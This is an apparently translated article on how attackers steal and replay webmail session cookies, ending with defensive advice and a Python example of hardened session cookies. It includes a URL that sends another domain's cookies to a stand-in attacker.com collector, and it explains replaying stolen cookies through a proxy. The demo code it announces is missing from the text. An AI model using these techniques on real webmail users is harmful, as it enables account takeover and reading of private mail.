Webmail Offense and Defense (6)

Source: Internet
Author: User
Tags: object, error handling, modify, domain, domain name, access
If an attacker can obtain a user's webmail cookie, breaking into that user's webmail is easy. How does an attacker get hold of the cookie? If the attacker has planted a trojan on the user's computer, or can sniff the user's traffic on the network, obtaining the cookie is trivial, but that is not the point of this discussion: with that level of access, why bother with the cookie when the email password itself is there for the taking?

If the webmail system has a cross-site scripting vulnerability, the attacker can trick the user and read the cookie with little effort. Many websites have this kind of vulnerability, but it is rare in webmail systems.

An HTML message containing a malicious script can also let an attacker obtain the webmail cookie. The script in the HTML message reads the cookie of the current webmail session, assigns it to a form field, and then submits the form automatically to the attacker, who thereby obtains the session cookie. Here is a demo program:


GETCOOKIE.CGI is a CGI program placed on the attacker's web server; it receives the cookie submitted by the form and records it or notifies the attacker. In practice an attacker will of course design the HTML mail and the getcookie.cgi program to be more covert and more deceptive, so that the user is unlikely to notice anything.

Normally a browser stores cookies according to the domain name of the web server that set them, and only sends a cookie back to a web server with the same domain name. Browser vulnerabilities, however, give attackers an opportunity to obtain cookies belonging to other domains, and the widely used browsers Internet Explorer, Netscape and Mozilla have all had such flaws. Here are several examples of Internet Explorer (IE 5.0, IE 5.5 and IE 6.0) leaking cookie information:

(1) The object element in HTML is used to embed an external object within the current page, but Internet Explorer's improper handling of one of the object element's properties can disclose the cookies of any domain, as shown in the following demo code:


(2) Internet Explorer's faulty handling of the "about" protocol allows a specially crafted URL request to display or modify the cookies of any domain, for example (the following code is on a single line):

About://www.anydomain.com/

(3) Internet Explorer mistakenly treats the host name that precedes a "%20" (a URL-encoded space) in the URL as the domain to which the cookie belongs. If the attacker owns a domain name "attacker.com" and configures wildcard DNS resolution so that "*.attacker.com" points to the IP address of the attacker's web server, then any subdomain or host name under "attacker.com" resolves to that IP address, and when the user requests a URL like the following, the browser sends the cookies of the "anydomain.com" domain to the attacker:

http://anydomain.com%20.attacker.com/getcookie.cgi

To obtain a webmail's temporary (session) cookie, the attacker writes such code into an HTML message; it executes automatically when the user views the message, and the attacker obtains the temporary cookie of the user's current browser session. Alternatively, the attacker can send the user a URL that leaks the cookie and trick the user into opening it, which likewise yields the temporary cookie.

Once the attacker has the cookie, if it contains sensitive information such as the password, breaking into the user's mailbox is straightforward. Cases of this kind have occurred in webmail systems such as Hotmail, but webmail systems that leak sensitive information in the cookie itself are still rare.

After obtaining the cookie, the attacker still has to make it available to a browser in order to establish a session with the webmail system and get into the user's webmail. For a persistent cookie, the attacker simply copies the information into his or her own cookie file, after which the browser can present it and establish a session with the webmail system. A temporary cookie, however, is held in memory, and getting a browser to present it is not as simple.

To make the browser present the temporary cookie, the attacker could edit the cookie in memory, or modify an open-source browser so that it allows cookies to be edited, but neither is easy. The easy way is to use the Achilles program (available for download from the packetstormsecurity.org website). Achilles is an HTTP proxy that captures the HTTP session between browser and web server and allows the HTTP session, including temporary cookies, to be edited before the proxy forwards the data.

The webmail system should avoid persistent cookies for session tracking, so that cookie session attacks cannot succeed easily. To guard against cookie session attacks, users can take the following steps to improve their security:

(1) Set the browser's cookie security level to block all cookies, or to accept cookies only from a small number of trusted domains.

(2) Use a cookie management tool, such as Cookie Pal or Burnt Cookies, to improve control over the cookies stored on the system.

(3) Patch the browser promptly to close the cookie leakage vulnerabilities described above.
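The server-side recommendation above, that webmail should not track sessions with persistent cookies, is shown below as an added example (not code from the original article): a weak cookie that persists on disk and carries the password itself, beside a hardened issuer that hands out a random opaque token with no Expires/Max-Age, validated against a server-side store with an idle timeout. All names and the 15-minute timeout are hypothetical.

```python
import base64
import secrets
from http.cookies import SimpleCookie

IDLE_TIMEOUT = 15 * 60  # hypothetical: seconds before an idle session is invalidated


def weak_cookie_header(user: str, password: str) -> str:
    """Weak pattern from the article: a persistent cookie that embeds the
    credential, so any leak (XSS, browser domain bug) hands over the mailbox."""
    c = SimpleCookie()
    c["webmail"] = base64.b64encode(f"{user}:{password}".encode()).decode()
    c["webmail"]["expires"] = 30 * 24 * 3600  # written to the cookie file for 30 days
    return c.output(header="").strip()


class SessionStore:
    """Hardened pattern: opaque token, server-side state, session-only cookie."""

    def __init__(self) -> None:
        self._sessions: dict[str, tuple[str, float]] = {}  # token -> (user, last_seen)

    def issue(self, user: str, now: float) -> str:
        token = secrets.token_urlsafe(32)  # unguessable, carries no user data
        self._sessions[token] = (user, now)
        return token

    def cookie_header(self, token: str) -> str:
        c = SimpleCookie()
        c["webmail_sid"] = token
        c["webmail_sid"]["path"] = "/"
        c["webmail_sid"]["secure"] = True    # never sent over plain HTTP
        c["webmail_sid"]["httponly"] = True  # not readable by script in an HTML message
        # No Expires/Max-Age: the browser keeps it in memory and drops it on exit.
        return c.output(header="").strip()

    def lookup(self, token: str, now: float):
        """Return the user for a live session, else None. A leaked token stops
        working once the session idles out or the user logs out."""
        entry = self._sessions.get(token)
        if entry is None:
            return None
        user, last_seen = entry
        if now - last_seen > IDLE_TIMEOUT:
            del self._sessions[token]
            return None
        self._sessions[token] = (user, now)
        return user

    def logout(self, token: str) -> None:
        self._sessions.pop(token, None)
```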
